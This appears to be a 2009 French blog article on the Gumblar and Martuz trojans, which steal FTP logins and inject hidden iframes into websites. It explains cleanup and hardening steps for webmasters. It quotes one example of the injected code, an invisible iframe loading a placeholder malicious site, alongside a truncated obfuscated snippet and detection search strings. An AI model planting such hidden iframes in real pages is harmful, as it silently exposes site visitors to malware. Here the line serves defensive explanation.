ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.).
Depuis mai 2009, mais aussi avant, des webmasters ont vu des lignes de code étranges apparaître dans leurs pages web, et de là se connecter à des sites très suspects, de manière invisible pour l'utilisateur ordinaire.
Cet article explique comment le code de pages de nombreux sites Web peut être modifié par des virus malveillants en incluant des connections cachées vers des sites malveillants.
Ces systèmes viraux de type cheval de Troie sont installés sur les PC des webmasters et détectent les codes FTP pour les utiliser et permettre la modification des pages web qui deviendront à leur tour contagieux. Les contagions connues jusqu’ici ont été effectuées par l'intermédiaire de versions anciennes des logiciels Adobe Reader (PDF Reader) et Adobe Flash Player. Mais des failles d’autres logiciels peuvent évidemment être utilisés.
Des solutions et méthodes pour faire face à ces attaques sont proposées.
Souvent, les webmasters eux-mêmes ne réalisent le problème que par hasard, en éditant un fichier par exemple.
la forme la plus banale du code malicieux introduit ressemble plus ou moins à ceci :
<iframe src="http://site malveillant/index.php" width=107 height=152 style="visibility: hidden"></iframe>
L’iframe est formaté pour être invisible ! Depuis mai 2009, des codes malicieux beaucoup plus complexes ont fait leur apparition et sont extrêmement difficiles à détecter sur les pages.
Par exemple (ce code est volontairement altéré avec « …… » et des parties sont supprimées) :
(function(){var ……….)})(/"/g);
Souvent, la fonction n’a pas de nom. Elle est anonyme et s’auto appelle (self-invoking).
Ces attaques sont l’œuvre de variantes du virus de type "trojan" Gumblar (du nom du site -aujourd'hui disparu- vers lequel il dirigeait l'iframe), devenu par la suite Martuz (plus difficile à détecter, les URL malicieuses sont mieux cachées), et ayant, encore évolué depuis. (De pire en pire.)
Solution et methodes :
1) Pour TOUS les PC susceptibles d'être contaminés, même si on pense qu'il ne le sont pas :
- Videz les caches de votre navigateur si vous suspectez une attaque. Videz-les avant de commencer un examen ou un nettoyage ; videz-les après également ; et plusieurs fois par sécurité.
- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.
- Par précaution et pour plus de sécurité désinstallez vote client FTP (FileZilla ou autre)
-De même pour votre éditeur de texte (si vous utilisez un spécial comme Notepad++ par exemple.
- Mettre à jour les anti-virus. (Il se trouve que l'anti-virus AVAST -même la version gratuite- a été le premier capable de détecter et éradiquer Gumblar en mai dernier, mais aujourd'hui d'autre produit le font: un anti-virus ne vaut que ce que vaut sa mise à jour et la rapidité de celle-ci.)
Il peut est préférable de lancer l'antivirus à partir d'un CD-ROM bootable propre mais cela n'est pas nécessaire avec cette famille de virus.
- Lancer son anti-virus et faire un scan complet.
- Supptrimer autant que possible tous les fichiers inutiles de votre PC
- Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu ! Télécharger les dernières versions de Adobe Reader et Adobe Flash Player ainsi que le client FTP, de préférence sur une machine sûre.
- Ensuite installer les dernières versions de Adobe Acrobat Reader, Adobe Flash Player et le client FTP.
- Mettez à jour vos autres plug-ins, add-ons, etc.
2) Sur TOUS les sites pour lesquels vous avez des accès FTP, même si vous pensez qu'ils ne sont pas contaminés :
-Restaurer à partir d'une sauvegarde saine, ou générer les pages à nouveau. Sinon, sans fichiers propres, voilà la galère :
- Changer vos codes FTP (au moins le mot de passe)
- Avant de nettoyer votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.)Et n'oubliez pas les pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.
- Rechercher le terme "iframe" dans toutes les pages. (Oui, c'est très pénible. Mais nécessaire)
- Rechercher aussi le terme "iframe" dans tous les templates (ou autre terminologie) utilisés par vos Forums, CMS, Blogs, Portails, etc. pour créer les pages dynamiques.
- Vérifier si l'usage de l'iframe est légitime ou non (normalement un codeur n'utiliser pas d'iframe dans son travail sauf s'il est totalement obligé de le faire)
- Supprimer les lignes de codes se rapportant à l'iframe illégitime. Attention, plus le virus est malin, plus cette opération peut être difficile. (Par exemple, s'il a utilisé plusieurs lignes d'instructions pour produire le même effet que la ligne de type classique citée plus haut.)
- Faire de même avec "script src=", pour les Martuz-like
- Faire de même avec " “(function(“ " et éventuellement d'autres choses (et là ça peut être l'enfer).
- Faire évidemment un nouveau backup du site. Et vérifier que les anciens backups ne sont pas contaminés !
- Il peut être souhaitable de lancer des recherches sur les chaînes de caractères suspectes pour déceler du code mieux dissimulé, par exemple sur "visibility: hidden", voire, si l'on est réellement inquiet sur "http://" et vérifier les URL... ce qui sera évidemment pénible.
Demander à toutes les personnes ayant possédé les codes de vos FTP qu'elles fassent impérativement la même chose sur TOUS leurs PC et TOUS leurs propres sites !
- Modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage, sauf impossibilité technique :
- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.
* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :
[INDENT]- Passer les fichiers en 604
- Passer les dossiers en 705
et, quand vous avez fini, remettez 404 et 505.
Si vous ne voulez pas le faire pour tous les fichiers, faîtes-le au moins pour les fichiers index.* Ce sera mieux que rien.
- Et en fin créez un piége pour les pirates :
Il faut créer des pages « index » témoins extrêmement simples et facile à lire, avec juste le code minimal d’une page html ou php, à des endroits où elles ne servent à rien.
Par exemple, si votre vrai index est index.php, créez un index.html, etc. (vous pouvez avoir besoin de configurer un fichier .htaccess pour être bien sûr que votre site continuera à utiliser le bon index !)
Vous pouvez aussi placer ces pages index dans des dossiers volontairement vides.
Avec un peu de chance, le système viral sera « attiré » par ces fausses pages index (abeilles et pot de miel) et les infectera toutes. Or, vos pages témoins sont faciles à lire. Dans ce cas, vous pourrez vous rendre compte de l’attaque, et, en prime, voir clairement le code utilisé !
Attention : on ne peut évidemment pas garantir le succès de cette méthode.
Note importante :
Il est absolument impératif d'utiliser des anti-virus et des anti-malware à jour et de veiller à la mise à jour de vos plug-ins de navigateurs et dispositifs similaires..
Dans le cas où, sur des PC suspects, un anti-virus ne donne rien, il peut être judicieux de le désinstaller et en installer un autre pour faire un nouveau test.
Moi j'ai deux PC et j'utilise Avaste sur l'un et kaspersky sur l'autre et ça marche bien .
Bonne chance j'attend vos commentaires et merci pour votre visite.
Visitez aussi mon site http://apprendre.uuuq.com
